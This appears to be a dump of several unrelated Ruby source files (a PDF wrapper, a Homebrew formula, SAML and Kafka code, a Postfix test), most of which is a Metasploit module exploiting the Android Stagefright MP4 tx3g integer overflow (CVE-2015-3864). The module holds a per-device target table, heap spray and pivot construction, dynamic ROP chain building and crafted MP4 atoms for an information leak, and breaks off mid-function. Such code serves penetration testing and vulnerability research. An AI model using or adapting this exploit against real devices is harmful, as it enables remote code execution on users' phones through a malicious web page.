raise "Location of wkhtmltopdf unknown" if @exe_path.empty?
raise "Bad wkhtmltopdf's path" unless File.exists?(@exe_path)
raise "Wkhtmltopdf is not executable" unless File.executable?(@exe_path)
end
def pdf_from_string(string, options=nil)
command_for_stdin_stdout = "#{@exe_path} #{options} - - -q" # -q for no errors on stdout
p "*"*15 + command_for_stdin_stdout + "*"*15 if RAILS_ENV == 'development'
Open3.popen3(command_for_stdin_stdout) do |stdin, stdout, stderr|
stdin.write(string)
stdin.close
pdf = stdout.read
raise "PDF could not be generated!\n#{stderr.read}" if pdf.length == 0
pdf
end
end
end
| 33.7 | 92 | 0.703264 |
bf7272556244eb750d9025685faa11ac89defa8d | 1,606 | class Pygobject3 < Formula
desc "GNOME Python bindings (based on GObject Introspection)"
homepage "https://wiki.gnome.org/Projects/PyGObject"
url "https://download.gnome.org/sources/pygobject/3.34/pygobject-3.34.0.tar.xz"
sha256 "87e2c9aa785f352ef111dcc5f63df9b85cf6e05e52ff04f803ffbebdacf5271a"
bottle do
rebuild 1
sha256 "19438d4f683d7c240842f9ae4793ac7628b2e412e1fc9ece7f11bb7ae6cfa2a1" => :catalina
sha256 "bc8b4c3b891a179d532e2ef4352d6c6f767472d37f2d800ce2042c83b11c482f" => :mojave
sha256 "7c7b94ec1114c60af7d943b3d5230b1986515a6eeb057905940711084b43d14b" => :high_sierra
sha256 "cf9af919bcdb3b194a8f643c15b09aecc49be75fffdc8fa594b2ca7dfb78acc9" => :x86_64_linux
end
depends_on "meson" => :build
depends_on "ninja" => :build
depends_on "pkg-config" => :build
depends_on "gobject-introspection"
depends_on "py3cairo"
depends_on "python"
def install
mkdir "buildpy3" do
system "meson", "--prefix=#{prefix}",
"-Dpycairo=true",
"-Dpython=python3",
".."
system "ninja", "-v"
system "ninja", "install", "-v"
end
end
test do
Pathname("test.py").write <<~EOS
import gi
gi.require_version("GLib", "2.0")
assert("__init__" in gi.__file__)
from gi.repository import GLib
assert(31 == GLib.Date.get_days_in_month(GLib.DateMonth.JANUARY, 2000))
EOS
pyversion = Language::Python.major_minor_version "python3"
ENV.prepend_path "PYTHONPATH", lib/"python#{pyversion}/site-packages"
system "python3", "test.py"
end
end
| 34.170213 | 94 | 0.697385 |
382afc775e89f2079384410adf7405fbd2289b4e | 1,004 | # encoding: utf-8
module SamlIdp
class IdpController < ActionController::Base
include SamlIdp::Controller
protect_from_forgery
if Rails.version.to_i < 4
before_filter :validate_saml_request
else
before_action :validate_saml_request
end
def new
render :template => "saml_idp/idp/new"
end
def create
unless params[:email].blank? && params[:password].blank?
person = idp_authenticate(params[:email], params[:password])
if person.nil?
@saml_idp_fail_msg = "Incorrect email or password."
else
@saml_response = idp_make_saml_response(person)
render :template => "saml_idp/idp/saml_post", :layout => false
return
end
end
render :template => "saml_idp/idp/new"
end
protected
def idp_authenticate(email, password)
raise "Not implemented"
end
def idp_make_saml_response(person)
raise "Not implemented"
end
end
end
| 22.818182 | 72 | 0.639442 |
1c758ff7a971dcd2e63ea7b0231dee3721661bdd | 2,678 | require "spec_helper"
describe "AdminOperations" do
let(:admin) { rdkafka_config.producer }
describe "#create_topic and #delete_topic" do
context "when topic does not exist" do
before do
# Remove admin_new_topic if it already exists first
begin
admin.delete_topic("admin_new_topic")
# Wait a little to allow Kafka to catch up
sleep 1
rescue Rdkafka::RdkafkaError
# Ignore error while deleting
end
end
it "should succeed" do
admin.create_topic("admin_new_topic", config: {"retention.ms": "12345"})
# Wait a little to allow Kafka to catch up
sleep 1
expect(admin.describe_topic("admin_new_topic")["retention.ms"]).to eq("12345")
admin.alter_topic("admin_new_topic", {"retention.ms": "56789"})
expect(admin.describe_topic("admin_new_topic")["retention.ms"]).to eq("56789")
expect do
admin.create_partitions_for("admin_new_topic", num_partitions: 1)
end.to raise_error(Rdkafka::RdkafkaError, /invalid_partitions/)
metadata = admin.metadata_for("admin_new_topic")
expect(metadata.partitions.count).to eq(1)
admin.create_partitions_for("admin_new_topic", num_partitions: 8)
metadata = admin.metadata_for("admin_new_topic")
expect(metadata.partitions.count).to eq(8)
admin.delete_topic("admin_new_topic")
end
end
context "when topic exists" do
it "should raise an error" do
expect do
admin.create_topic("empty_test_topic")
end.to raise_error(Rdkafka::RdkafkaError, "Topic 'empty_test_topic' already exists. - Broker: Topic already exists (topic_already_exists)")
end
end
end
describe "#describe_topic" do
context "when topic does not exist" do
it "should raise an error" do
expect do
admin.describe_topic("i_dont_exist")
end.to raise_error(Rdkafka::RdkafkaError, "Broker: Unknown topic or partition - Broker: Unknown topic or partition (unknown_topic_or_part)")
end
end
context "when topic exists" do
it "should succeed" do
config = admin.describe_topic("empty_test_topic")
expect(config.keys).not_to be_empty
expect(config["min.insync.replicas"]).to eq("1")
end
end
context "when kafka brokers do not exist" do
it "should time out" do
admin = Rdkafka::Config.new("bootstrap.servers": "i_dont_exist:9099").producer
expect do
admin.describe_topic("i_dont_exist", timeout: 2)
end.to raise_error(Rdkafka::RdkafkaError, /timed_out/)
end
end
end
end
| 33.061728 | 148 | 0.660194 |
183d3275367252ac3af5d5f16c4fa4a7fcb59779 | 2,569 | module Entrepot
#
# This module should not exist, in essence.
# As of moment of writing (April 2012), Virtus does not support circular dependencies for
# models, neither it supports an ability to lazily define or define a dependency via
# string or symbol. So either you pre-define a class (you remember good old C days, right?
# or I open up a class and give you a waring which you shouldn't be scared of.
#
module Model
module ClassMethods
def const_missing(name)
puts "Warning: #{name} was not defined, assuming further definition. Keep calm tho."
const_set(name, Class.new)
end
end
def persisted?
@persisted || false
end
def mark_as_persisted
@persisted = true
end
# Ported from Virtus fork
#
# Returns a hash of all publicly accessible attributes by
# recursively calling #to_hash on the objects that respond to it.
#
# @example
# class Person
# include Virtus
#
# attribute :name, String
# attribute :age, Integer
# attribute :email, String, :accessor => :private
#
# attribute :friend, Person
# end
#
# john = Person.new({ :name => 'John', :age => 28 })
# jack = Person.new({ :name => 'Jack', :age => 31, friend => john })
#
# user.to_hash # => { :name => 'John', :age => 28, :friend => { :name => 'Jack', :age => 31 } }
#
# @return [Hash]
#
# @api public
def to_hash
hash = attributes.dup
hash.each do |key, value|
case
when value.is_a?(Array)
hash[key] = value.collect do |item_within_value|
safely_recurse_into(item_within_value) { |i| i.respond_to?(:to_hash) ? i.to_hash : i }
end
when value.respond_to?(:to_hash)
hash[key] = safely_recurse_into(value) do |v| v.to_hash end
when value.nil?
hash.delete(key)
end
end
hash
end
protected
# Safely recurses into the value, avoiding StackOverflow errors.
#
# Accepts any value parameter, and a block, which will receive this value parameter.
#
# @return [Object]
#
# @api private
def safely_recurse_into(value)
Thread.current[caller.first] ||= []
caller_stack = Thread.current[caller.first]
return_value = nil
if !caller_stack.include?(value.object_id)
caller_stack.push(self.object_id)
return_value = yield(value)
caller_stack.pop
end
return_value
end
end
end
| 27.623656 | 102 | 0.60218 |
28fa98fdce75c0285afe2ef0c19873c9cd5ad67a | 1,094 | Pod::Spec.new do |s|
# pod lib lint --allow-warnings --verbose --skip-import-validation
s.name = "MXLogger"
s.version = "0.1.3.1"
s.summary = "MXLogger 客户端夸平台日志收集"
s.description = <<-DESC
MXLogger 客户端夸平台日志收集
DESC
s.homepage = "https://github.com/coder-dongjiayi/MXLogger"
s.license = { :type => "BSD 3-Clause", :file => "LICENSE.TXT"}
s.author = { "dongjiayi" => "[email protected]" }
s.ios.deployment_target = "9.0"
s.source = { :git => "https://github.com/coder-dongjiayi/MXLogger.git", :tag => "v#{s.version}" }
s.source_files = "iOS/MXLogger/MXLogger", "iOS/MXLogger/MXLogger/*.{h,mm}"
s.public_header_files = "iOS/MXLogger/MXLogger/MXLogger.h"
s.framework = "CoreFoundation"
s.dependency 'MXLoggerCore', "0.1.3.1"
s.libraries = "z", "c++"
s.pod_target_xcconfig = {
'VALID_ARCHS' => 'x86_64 armv7 arm64',
"CLANG_CXX_LANGUAGE_STANDARD" => "gnu++17",
"CLANG_CXX_LIBRARY" => "libc++",
"CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF" => "NO",
}
end
| 29.567568 | 105 | 0.597806 |
ff142976d8cb3e9eff217b8ab9b858d4df228f5b | 1,169 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'liquid/c/version'
Gem::Specification.new do |spec|
spec.name = "liquid-c"
spec.version = Liquid::C::VERSION
spec.authors = ["Justin Li", "Dylan Thacker-Smith"]
spec.email = ["[email protected]"]
spec.summary = "Liquid performance extension in C"
spec.homepage = "https://github.com/shopify/liquid-c"
spec.license = "MIT"
spec.extensions = ['ext/liquid_c/extconf.rb']
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency 'liquid', '>= 3.0.0'
spec.add_development_dependency 'bundler', ">= 1.5" # has bugfix for segfaulting deploys
spec.add_development_dependency "rake"
spec.add_development_dependency 'rake-compiler'
spec.add_development_dependency 'minitest'
spec.add_development_dependency 'stackprof' if Gem::Version.new(RUBY_VERSION) >= Gem::Version.new("2.1.0")
end
| 40.310345 | 108 | 0.67408 |
ffcac86a3efe97b2f3e96c4d5b8e212b619f0a6f | 3,718 | # encoding: UTF-8
#
# Author:: Xabier de Zuazo (<[email protected]>)
# Copyright:: Copyright (c) 2014 Onddo Labs, SL.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
require 'net/smtp'
require_relative 'mail_helpers'
describe 'Postfix' do
describe command('/usr/sbin/postconf') do
its(:exit_status) { should eq 0 }
its(:stderr) { should eq '' }
end
describe process('master') do
it { should be_running }
end
# smtp
describe port(25) do
it { should be_listening.with('tcp') }
end
# ssmtp
describe port(465) do
it { should be_listening.with('tcp') }
end
# submission
describe port(587) do
it { should be_listening.with('tcp') }
end
it 'connects to smtp SSL' do
expect(
command('echo | openssl s_client -connect 127.0.0.1:465')
.exit_status
).to eq 0
end
it 'connects to smtp with starttls' do
expect(
command('echo | openssl s_client -starttls smtp -connect 127.0.0.1:smtp')
.exit_status
).to eq 0
end
it 'is able to login using submission (plain)' do
smtp = Net::SMTP.new 'localhost', 587
ctx = OpenSSL::SSL::SSLContext.new
ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
smtp.enable_starttls(ctx)
smtp.start(
'onddo.com', '[email protected]', 'p0stm@st3r1', :plain
) { |_smtp| puts 'OK' }
end
describe 'when an email is sent through smtp' do
fingerprint = "G27XB6yIyYyM99Tv8UXW#{Time.new.to_i}"
let(:maildir) { '/var/vmail/foobar.com/postmaster' }
before(:context) { send_email(fingerprint) }
it 'is able to receive it', retry: 30, retry_wait: 1 do
expect(all_file_contents("#{maildir}/new/*")).to include fingerprint
end
end
family = os[:family].downcase
key_dir, cert_dir =
if %w(debian ubuntu).include?(family)
%w(/etc/ssl/private /etc/ssl/certs)
elsif %w(redhat centos fedora scientific amazon).include?(family)
%w(/etc/pki/tls/private /etc/pki/tls/certs)
else
%w(/etc /etc)
end
describe file("#{cert_dir}/postfix.pem") do
it { should be_file }
it { should be_mode 644 }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
end
describe file("#{key_dir}/postfix.key") do
it { should be_file }
it { should be_mode 600 }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
end
describe file('/etc/mailname') do
it { should be_file }
it { should be_mode 644 }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
end
describe file('/var/spool/postfix/etc') do
it { should be_directory }
it { should be_mode 755 }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
end
%w(
etc/resolv.conf
etc/localtime
etc/services
etc/hosts
etc/nsswitch.conf
etc/nss_mdns.config
).each do |chroot_file|
describe file("/var/spool/postfix/#{chroot_file}"),
if: ::File.exist?("/#{chroot_file}") do
it { should be_file }
it { should be_mode 644 }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
end
end
end
| 26.942029 | 79 | 0.656805 |
9145b57847947aa6c8151368a89270d64d4c74eb | 222 | require 'fog/core/collection'
require 'fog/libvirt/models/compute/nic'
module Fog
module Libvirt
class Compute
class Nics < Fog::Collection
model Fog::Libvirt::Compute::Nic
end
end
end
end
| 17.076923 | 40 | 0.675676 |
28172c5d868c2a8d16abe6727349902a38a0ac5d | 107 | # frozen_string_literal: true
module SolidusAdmin
class DashboardsController < BaseController
end
end
| 15.285714 | 45 | 0.82243 |
7a2b69561efd9083702969feb7f64ec8db094cc9 | 40,306 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' => "Android Stagefright MP4 tx3g Integer Overflow",
'Description' => %q{
This module exploits an integer overflow vulnerability in the Stagefright
Library (libstagefright.so). The vulnerability occurs when parsing specially
crafted MP4 files. While a wide variety of remote attack vectors exist, this
particular exploit is designed to work within an HTML5 compliant browser.
Exploitation is done by supplying a specially crafted MP4 file with two
tx3g atoms that, when their sizes are summed, cause an integer overflow when
processing the second atom. As a result, a temporary buffer is allocated
with insufficient size and a memcpy call leads to a heap overflow.
This version of the exploit uses a two-stage information leak based on
corrupting the MetaData that the browser reads from mediaserver. This method
is based on a technique published in NorthBit's Metaphor paper. First,
we use a variant of their technique to read the address of a heap buffer
located adjacent to a SampleIterator object as the video HTML element's
videoHeight. Next, we read the vtable pointer from an empty Vector within
the SampleIterator object using the video element's duration. This gives
us a code address that we can use to determine the base address of
libstagefright and construct a ROP chain dynamically.
NOTE: the mediaserver process on many Android devices (Nexus, for example) is
constrained by SELinux and thus cannot use the execve system call. To avoid
this problem, the original exploit uses a kernel exploit payload that disables
SELinux and spawns a shell as root. Work is underway to make the framework
more amenable to these types of situations. Until that work is complete, this
exploit will only yield a shell on devices without SELinux or with SELinux in
permissive mode.
},
'License' => MSF_LICENSE,
'Author' =>
[
# Exodus/jordan # initial discovery / disclosure
'jduck', # Metasploit module, further infoleak development
'NorthBit' # intiial information leak implementation
],
'References' =>
[
[ 'AKA', 'stagefright' ],
[ 'CVE', '2015-3864' ],
[ 'URL', 'https://blog.exodusintel.com/2015/08/13/stagefright-mission-accomplished/' ],
[ 'URL', 'http://googleprojectzero.blogspot.com/2015/09/stagefrightened.html' ],
[ 'URL', 'https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf' ],
[ 'URL', 'https://github.com/NorthBit/Metaphor' ],
# Not used, but related
[ 'URL', 'http://drops.wooyun.org/papers/7558' ],
[ 'URL', 'http://translate.wooyun.io/2015/08/08/Stagefright-Vulnerability-Disclosure.html' ],
[ 'URL', 'https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2016/01/libstagefright-exploit-notespdf/' ],
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true,
},
#'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' },
'Platform' => 'linux',
'Arch' => [ARCH_ARMLE], # TODO: , ARCH_X86, ARCH_X64, ARCH_MIPSLE],
'Targets' =>
[
[ 'Automatic', {} ],
#
# Each target includes information about the device, firmware, and
# how exactly to about exploiting it.
#
# Primarily, these targets are used to map a browser's User-Agent to
# exploit specifics for that device / build.
#
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.0 (LRX21P)',
{
'Model' => 'Nexus 7',
'Build' => 'LRX21P',
'Release' => '5.0',
'Rop' => 'lrx',
'SprayAddress' => 0xb1508000
}
],
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.0.1 (LRX22C)',
{
'Model' => 'Nexus 7',
'Build' => 'LRX22C',
'Release' => '5.0.1',
'Rop' => 'lrx'
}
],
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.0.2 (LRX22G)',
{
'Model' => 'Nexus 7',
'Build' => 'LRX22G',
'Release' => '5.0.2',
'Rop' => 'lrx'
}
],
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.1 (LMY47O)',
{
'Model' => 'Nexus 7',
'Build' => 'LMY47O',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY47V)',
{
'Model' => 'Nexus 7',
'Build' => 'LMY47V',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48G)',
{
'Model' => 'Nexus 7',
'Build' => 'LMY48G',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48I)',
{
'Model' => 'Nexus 7',
'Build' => 'LMY48I',
'Release' => '5.1.1',
'Rop' => 'lmy-2'
}
],
[
'Nexus 7 (Mobile) (razorg) with Android 5.0.2 (LRX22G)',
{
'Model' => 'Nexus 7',
'Build' => 'LRX22G',
'Release' => '5.0.2',
'Rop' => 'lrx'
}
],
[
'Nexus 7 (Mobile) (razorg) with Android 5.1 (LMY47O)',
{
'Model' => 'Nexus 7',
'Build' => 'LMY47O',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 7 (Mobile) (razorg) with Android 5.1.1 (LMY47V)',
{
'Model' => 'Nexus 7',
'Build' => 'LMY47V',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 5 (hammerhead) with Android 5.0 (LRX21O)',
{
'Model' => 'Nexus 5',
'Build' => 'LRX21O',
'Release' => '5.0',
'Rop' => 'lrx'
}
],
[
'Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)',
{
'Model' => 'Nexus 5',
'Build' => 'LRX22C',
'Release' => '5.0.1',
'Rop' => 'lrx'
}
],
[
'Nexus 5 (hammerhead) with Android 5.1 (LMY47D)',
{
'Model' => 'Nexus 5',
'Build' => 'LMY47D',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 5 (hammerhead) with Android 5.1 (LMY47I)',
{
'Model' => 'Nexus 5',
'Build' => 'LMY47I',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 5 (hammerhead) with Android 5.1.1 (LMY48B)',
{
'Model' => 'Nexus 5',
'Build' => 'LMY48B',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 5 (hammerhead) with Android 5.1.1 (LMY48I)',
{
'Model' => 'Nexus 5',
'Build' => 'LMY48I',
'Release' => '5.1.1',
'Rop' => 'lmy-2'
}
],
[
'Nexus 6 (shamu) with Android 5.0 (LRX21O)',
{
'Model' => 'Nexus 6',
'Build' => 'LRX21O',
'Release' => '5.0',
'Rop' => 'lrx'
}
],
[
'Nexus 6 (shamu) with Android 5.0.1 (LRX22C)',
{
'Model' => 'Nexus 6',
'Build' => 'LRX22C',
'Release' => '5.0.1',
'Rop' => 'lrx'
}
],
[
'Nexus 6 (shamu) with Android 5.1 (LMY47D)',
{
'Model' => 'Nexus 6',
'Build' => 'LMY47D',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 6 (shamu) with Android 5.1 (LMY47E)',
{
'Model' => 'Nexus 6',
'Build' => 'LMY47E',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 6 (shamu) with Android 5.1 (LMY47I)',
{
'Model' => 'Nexus 6',
'Build' => 'LMY47I',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 6 (shamu) with Android 5.1.1 (LYZ28E)',
{
'Model' => 'Nexus 6',
'Build' => 'LYZ28E',
'Release' => '5.1.1',
'Rop' => 'shamu / LYZ28E'
}
],
[
'Nexus 6 (shamu) with Android 5.1 (LMY47M)',
{
'Model' => 'Nexus 6',
'Build' => 'LMY47M',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 6 (shamu) with Android 5.1.1 (LMY47Z)',
{
'Model' => 'Nexus 6',
'Build' => 'LMY47Z',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 6 (shamu) with Android 5.1.1 (LVY48C)',
{
'Model' => 'Nexus 6',
'Build' => 'LVY48C',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 6 (shamu) with Android 5.1.1 (LMY48I)',
{
'Model' => 'Nexus 6',
'Build' => 'LMY48I',
'Release' => '5.1.1',
'Rop' => 'lmy-2'
}
],
[
'Nexus 6 (shamu) with Android 5.1.1 (LYZ28J)',
{
'Model' => 'Nexus 6',
'Build' => 'LYZ28J',
'Release' => '5.1.1',
'Rop' => 'shamu / LYZ28J'
}
],
[
'Nexus 6 (shamu) with Android 5.1.1 (LVY48E)',
{
'Model' => 'Nexus 6',
'Build' => 'LVY48E',
'Release' => '5.1.1',
'Rop' => 'lmy-2'
}
],
[
'Samsung Galaxy S5 (VZW SM-G900V) with Android 5.0 (LRX21T)',
{
'Model' => 'SM-G900V',
'Build' => 'LRX21T',
'Release' => '5.0',
'Rop' => 'sm-g900v / OE1',
'SprayAddress' => 0xaf008000,
'SampleIteratorSize' => 0xa8,
'VectorSize' => 0xec
}
]
],
'Privileged' => true,
'DisclosureDate' => "Aug 13 2015",
'DefaultTarget' => 0))
=begin
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
=end
end
def exploit
@peers = {}
super
end
def get_target(request)
agent = request.headers['User-Agent']
self.targets.each do |t|
next if t.name == 'Automatic'
regexp = Regexp.escape("Linux; Android #{t['Release']}; #{t['Model']} Build/#{t['Build']}")
return t if (agent =~ /#{regexp}/)
end
return nil
end
#
# Construct a page worth of data that we'll spray
#
# NOTE: The data within is target-specific
#
def build_spray(my_target, peer, spray_addr)
# Initialize the page to a reasonable state.
page = ''
page = rand_text(4096)
# Load target-based exploit-specific variables
details = get_details(my_target)
return nil if details.nil?
# Calculate the libstagefright.so base address
vector_rva = details['VectorRVA']
vector_ptr = peer[:vector_vtable_addr]
libsf_base = (vector_ptr & 0xfffff000) - (vector_rva & 0xfffff000)
# If we smash mDataSource, this ends up controlling the program counter!!
=begin
0xb65fd7c4 <parseChunk(long long*, int)+4596>: ldr r2, [r0, #0]
0xb65fd7c6 <parseChunk(long long*, int)+4598>: str r1, [sp, #0]
0xb65fd7c8 <parseChunk(long long*, int)+4600>: ldr r5, [r7, #0]
0xb65fd7ca <parseChunk(long long*, int)+4602>: str r5, [sp, #4]
0xb65fd7cc <parseChunk(long long*, int)+4604>: ldr r6, [r2, #28]
0xb65fd7ce <parseChunk(long long*, int)+4606>: ldrd r2, r3, [r10]
0xb65fd7d2 <parseChunk(long long*, int)+4610>: blx r6
0xb65fd7d4 <parseChunk(long long*, int)+4612>: ldrd r2, r3, [sp, #64] ; 0x40
=end
# Initialize our pivot values and adjust them to libstagefright's base.
# First, load r0 (pointer to our buffer) into some register..
mds_pivot1 = libsf_base + details['Pivot1']
# Next, load sp (and probably other stuff) from there
mds_pivot2 = libsf_base + details['Pivot2']
# Finally, skip over some stuff and kick of the ROP chain
mds_adjust = libsf_base + details['Adjust']
# The offset to the ROP change beginning
rop_start_off = 0x30
# Point sp to the remainder of the ROP chain
new_sp = spray_addr + rop_start_off
# Sometimes the spray isn't aligned perfectly, this fixes that situation...
unalign_off = 0x998
new_sp2 = new_sp + 0x1000 - unalign_off
# This pointer should point to the beginning of the shellcode payload
payload_ptr = spray_addr + 0xa0
# Put the stack back!
stack_fix = "\x0a\xd0\xa0\xe1" # mov sp, r10 ; restore original sp
# Depending on the pivot strategy in use, we have to set things up slightly
# differently...
#
# In each case, we use a two-stage pivot that reads the spray address from
# r0 (we smashed that, remember).
#
# The addroffs array is used to map values to the offsets where the pivots
# expect them to be.
#
case details['PivotStrategy']
when 'lrx'
addroffs = [
[ 0x0, new_sp ],
[ 0x10, mds_pivot2 ],
[ 0x1c, mds_pivot1 ],
]
# Since we are only popping one item in pivot2, we reduce the rop_start_off
rop_start_off -= 4
# Adjust the payload pointer
payload_ptr -= 4
when 'lmy-1'
addroffs = [
[ 0x8, new_sp ],
[ 0xc, mds_adjust ],
[ 0x10, mds_pivot2 ],
[ 0x1c, mds_pivot1 ]
]
when 'lmy-2'
ptr_to_mds_pivot2 = spray_addr + 0x10 - 0x18 # adjust for displacement
addroffs = [
[ 0x0, ptr_to_mds_pivot2 ],
[ 0x8, new_sp ],
[ 0xc, mds_adjust ],
[ 0x10, mds_pivot2 ],
[ 0x1c, mds_pivot1 ]
]
stack_fix = "\x09\xd0\xa0\xe1" # mov sp, r9 ; restore original sp
when 'lyz'
ptr_to_mds_pivot2 = spray_addr + 0x8
addroffs = [
[ 0x0, ptr_to_mds_pivot2 ],
[ 0x8, mds_pivot2 ],
[ 0x1c, mds_pivot1 ],
[ 0x24, new_sp ],
# lr is at 0x28!
[ 0x2c, mds_adjust ]
]
# We can't fix it becuse we don't know where the original stack is anymore :-/
stack_fix = ""
when 'sm-g900v'
addroffs = [
[ 0x4, mds_adjust ],
[ 0x10, new_sp ],
[ 0x1c, mds_pivot1 ],
[ 0x20, mds_pivot2 ]
]
else
print_error("ERROR: PivotStrategy #{details['PivotStrategy']} is not implemented yet!")
return nil
end
# We need our ROP to build the page... Create it.
rop = generate_rop_payload('stagefright', stack_fix + payload.encoded, {'base' => libsf_base, 'target' => my_target['Rop'] })
# Fix up the payload pointer in the ROP
idx = rop.index([ 0xc600613c ].pack('V'))
rop[idx, 4] = [ payload_ptr ].pack('V')
# Insert the ROP
page[rop_start_off, rop.length] = rop
# Insert the special values...
addroffs.each do |ao|
off,addr = ao
page[off,4] = [ addr ].pack('V')
# Sometimes the spray isn't aligned perfectly...
if addr == new_sp
page[off+unalign_off,4] = [ new_sp2 ].pack('V')
else
page[off+unalign_off,4] = [ addr ].pack('V')
end
end
page
end
#
# MPEG-4 specific functionality
#
def get_atom(tag, data='', length=nil)
if tag.length != 4
raise 'Yo! They call it "FourCC" for a reason.'
end
length ||= data.length + 8
if length >= 2**32
return [ [ 1 ].pack('N'), tag, [ length ].pack('Q>'), data ].join
end
[ [ length ].pack('N'), tag, data ].join
end
def get_stsc(num)
stsc_data = [ 0, num ].pack('N*') # version/flags, mNumSampleToChunkOffsets
stsc_data << [ 13+1, 0x5a5a5a5a, 37 ].pack('N*') * num
get_atom('stsc', stsc_data)
end
def get_ftyp
# Build the MP4 header...
ftyp = 'mp42'
ftyp << [ 0 ].pack('N')
ftyp << 'mp42'
ftyp << 'isom'
get_atom('ftyp', ftyp)
end
def get_pssh(alloc_size)
pssh_data = ''
pssh_data << [ 0 ].pack('N')
pssh_data << [ 0, 0, 0, 0 ].pack('N*')
pssh_data << [ alloc_size ].pack('N')
alloc_size.times do |off|
pssh_data << [ 0x55aa0000 + off ] .pack('V')
end
get_atom('pssh', pssh_data)
end
def get_metaitem(tag, type, data)
ret = ''
ret << tag.reverse
ret << type.reverse
case type
when 'in32'
ret << [ 4, data ].pack('V*')
when 'in64'
ret << [ 8, data ].pack('V*')
else
raise "How do you expect me to make a #{type.inspect} ??"
end
ret
end
def jemalloc_round(sz)
# These are in the 16-byte aligned runs
if (sz > 0x10 && sz <= 0x80)
round = 16
# 160 starts the 32-byte aligned runs
elsif (sz > 0x80 && sz <= 0x140)
round = 32
else
raise "Don't know how to round 0x%x" % sz
end
ret = (sz + (round - 1)) / round
ret *= round
return ret
end
#
# Leak data from mediaserver back to the browser!
#
# Stage 1 - leak a heap pointer near a SampleIterator object
# Stage 2 - read a code pointer from the SampleIterator object
#
def get_mp4_leak(my_target, peer)
# MPEG4 Fileformat Reference:
# http://qtra.apple.com/index.html
#
# Structure:
# [File type Chunk][Other Atom Chunks]
#
# Where [Chunk] == [Atom/Box Length][Atom/Box Type][Atom/Box Data]
#
sampiter_alloc_size = 0x78
sampiter_alloc_size = my_target['SampleIteratorSize'] if not my_target['SampleIteratorSize'].nil?
sampiter_rounded = jemalloc_round(sampiter_alloc_size)
vector_alloc_size = 0x8c
vector_alloc_size = my_target['VectorSize'] if not my_target['VectorSize'].nil?
groom_count = 0x10
is_samsung = (my_target['Rop'] == 'sm-g900v / OE1')
# Coerce the heap into a favorable shape (fill holes)
shape_vector = get_pssh(vector_alloc_size)
# Allocate a block of memory of the correct size
placeholder = get_atom('titl', ('t' * 4) + ('titl' * (vector_alloc_size / 4)) + [ 0 ].pack('C'))
# Make the first tx3g chunk, which is meant to overflow into a MetaData array.
# We account for the overhead of both chunks here and aim for this layout:
#
# placeholder after re-allocation | vector array data
# <len><tag><padding><is-64bit><tag><len hi><len low> | <overflow data>
#
# Realistically, tx3g1_padding can be any number that rounds up to the
# correct size class.
tx3g1_overhead = 0x8
tx3g2_overhead = 0x10
tx3g_target = jemalloc_round(vector_alloc_size)
tx3g1_padding = tx3g_target - (tx3g1_overhead + tx3g2_overhead)
tx3g_data = 'x' * tx3g1_padding
tx3g_1 = get_atom('tx3g', tx3g_data)
# NOTE: hvcC added in 3b5a6b9fa6c6825a1d0b441429e2bb365b259827 (5.0.0 and later only)
# avcC was in the initial commit.
near_sampiter = get_atom('hvcC', "C" * sampiter_alloc_size)
# Craft the data that will overwrite the header and part of the MetaData
# array...
more_data = ''
more_data << [ 9, vector_alloc_size - 0x10, 0, 0 ].pack('V*')
# Now add the thing(s) we want to control (partially)
#
